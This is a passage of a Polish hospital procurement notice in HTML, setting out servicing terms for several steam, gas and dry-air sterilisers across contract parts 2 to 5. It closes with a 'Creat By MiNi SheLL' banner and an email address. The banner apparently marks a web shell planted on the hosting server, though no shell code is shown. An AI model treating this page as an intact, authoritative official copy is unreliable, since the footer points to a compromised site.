1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy)  - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).
8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sterylizator gazowy firmy 3M -USA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu podlegającemu serwisowaniu:
Część 2 - Sterylizator gazowy firmy 3M -USA
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 17.11.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości.
Sterylizator gazowy	Steri-Vac 5XLP	1999	702886	3M USA	
Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy)  - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).
8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Autoklaw parowy firmy CISA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu podlegającego serwisowaniu:
Część 3 - Autoklaw parowy firmy CISA
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 28.09.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości.
Autoklaw parowy                	CISA 3270HB/2P/E/TS	2007	12256 /802-1404	CISA Włochy	
Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy)  - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).
8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Autoklaw parowy firmy Memmert.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu podlegającemu serwisowaniu
Część 4 - Autoklaw parowy firmy Memmert
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 27.09.2013, zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości. 
Sterylizator na suche powietrze	SFE 600 Memert	2007	G 6070730/ 802-1439	Memmert Niemcy	
Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy)  - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).
8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 - Autoklaw parowy firmy Getinge.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykaz sprzętu podlegającemu serwisowaniu
Część 5 - Autoklaw parowy firmy Getinge
Nazwa urządzenia	Typ	Rok	Nr fab.	Producent	Termin rozpoczęcia Umowy od 29.07.2013 zakończenia w ciągu 2 lat od momentu podpisania Umowy lub do wyczerpania wartości,.
Autoklaw 
parowy                	HS 33	2010	10231447 / 802-1927	Getinge Szwecja	
Przedmiotem zamówienia są usługi serwisowe dla urządzeń do sterylizacji sprzętu medycznego w asortymencie i ilościach określonych szczegółowo w wykazie sprzętu podlegającemu serwisowaniu polegające na:

1) wykonywaniu okresowych przeglądów technicznych i konserwacji  urządzeń  w terminach uzgodnionych z Zamawiającym,
2) usuwaniu awarii na pisemne zlecenie Zamawiającego, 

1.Pod pojęciem okresowych przeglądów technicznych i konserwacji należy rozumieć:
a)	przeprowadzenie wszelkich czynności technicznych w tym procedur konserwacyjnych wraz z wymianą elementów (typowanych przez producenta do wymiany przy przeglądach), 
b)	przeprowadzenie niezbędnych pomiarów i testów parametrów technicznych                i bezpieczeństwa elektrycznego,
c)	przeprowadzenie niezbędnych regulacji i ustawień parametrów technicznych zgodnych z wytycznymi producenta,
d)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),
e)	dokonywanie wpisów do paszportów technicznych urządzeń,
f)   wystawianie każdorazowo orzeczeń technicznych (certyfikatów) 

2.Pod pojęciem usunięcia awarii należy rozumieć:
a)	zlokalizowanie uszkodzenia,
b)	usunięcie niesprawności urządzenia poprzez wymianę uszkodzonych części, 
c)	sprawdzenie poprawności działania,
d)	dokonywanie wpisu do paszportu technicznego z przeprowadzonej naprawy.
e)	przygotowanie sprzętu do badań technicznych (rewizji) wykonywanych przez Urząd Dozoru Technicznego oraz udział w ich badaniach (jeżeli dotyczy),

Wykonawca zobowiązuje się podjąć czynności związane z usunięciem awarii niezwłocznie, nie później jednak niż w ciągu 48 godzin od chwili jej zgłoszenia  w dni robocze od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy.
	Po usunięciu awarii (jeżeli jest to wymagane odrębnymi przepisami) Wykonawca jest zobowiązany zgłosić ten fakt do UDT w celu przeprowadzenia badania odbiorczego. 
	W przypadku niedopuszczenia urządzenia do dalszej eksploatacji wskutek niewłaściwego przygotowania urządzenia do badania odbiorczego, Wykonawca pokrywa koszty związane  z ponownym wykonaniem badania odbiorczego.
Każdorazową interwencję serwisową Wykonawca odnotuje w paszporcie urządzenia. Potwierdzenie przyjęcia zlecenia Zamawiającego przesłanego fax-em do Wykonawcy, ma nastąpić poprzez jego zwrotne odesłanie z adnotacją przyjęcia do realizacji na nr fax-u 048/361-52-39.

3. Przeglądy okresowe i czynności usuwania awarii powinny być wykonywane  w siedzibie Zamawiającego, na jego pisemne zlecenie w oparciu o harmonogram przedstawiony Wykonawcy po podpisaniu umowy. W przypadku potrzeby przeprowadzenia przeglądu technicznego urządzenia lub jego  naprawy w siedzibie Wykonawcy, Wykonawca  zobowiązany jest w ramach usługi do zabrania  i ponownego dostarczenia  urządzenia do siedziby Zamawiającego w ramach ryczałtu.

4. Zaleca się zaoferowanie produktów (części) oryginalnych tj. produktów zgodnych pod względem parametrów technicznych, jakościowych, funkcjonalnych i użytkowych w stosunku do sprzętu posiadanego przez Zamawiającego. Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych tj. posiadających te same lub lepsze parametry techniczne, jakościowe, funkcjonalne i użytkowe.

5. Wykonawca zobowiązuje się do zabezpieczenia części zamiennych potrzebnych do realizacji przedmiotu umowy.

6. Oferowany okres gwarancji należytego wykonania usług dla całego zakresu prac stanowiących przedmiot zamówienia, wynosi 6 miesięcy na wykonaną usługę (na ten sam rodzaj uszkodzenia) oraz 12 miesięcy za dostarczoną część, liczony od dnia wystawienia raportu serwisowego lub karty pracy.

7.  Rozliczenia między Wykonawcą a Zamawiającym:
1) Za przeglądy techniczne - wg. ryczałtu obejmującego 100% kosztów związanych                     z wykonaniem przeglądu (w tym badań UDT i wystawianiem orzeczeń technicznych (certyfikatów)).
2) Za usunięcie awarii - naliczanie wartości jako iloczyn zryczałtowanej stawki roboczogodziny (zgodnie ze specyfikacją techniczną/formularzem cenowym, stanowiącym załącznik do Formularza oferty) i faktycznie przepracowanych godzin.
 Zryczałtowana stawka za roboczogodzinę obejmuje - koszty robocizny, delegacyjne, koszty przygotowania sprzętu do badań UDT, sporządzenia orzeczeń o stanie urządzeń                              ( ekspertyza).
3) Za wymienione części zg. z fakturą VAT, w przypadku gdy wartość jednorazowej wymiany części przekroczy kwotę od 5000,00 zł brutto dla autoklawów   i od 15000 zł brutto dla wytwornic pary, Wykonawca  załączy do faktury kosztorys zaakceptowany przez Zamawiającego.
4) Koszty UDT po usunięciu awarii (jeżeli dotyczy)  - pokrywane będą przez Zamawiającego. (Faktura wystawiona będzie przez UDT na Radomski Szpital                     Specjalistyczny).
8. W przypadku wyłączenia aparatu (urządzenia z użytkowania) podczas wykonywania usługi, do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/urządzeniu czytelnej informacji: /urządzenie niesprawne - nie używać/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com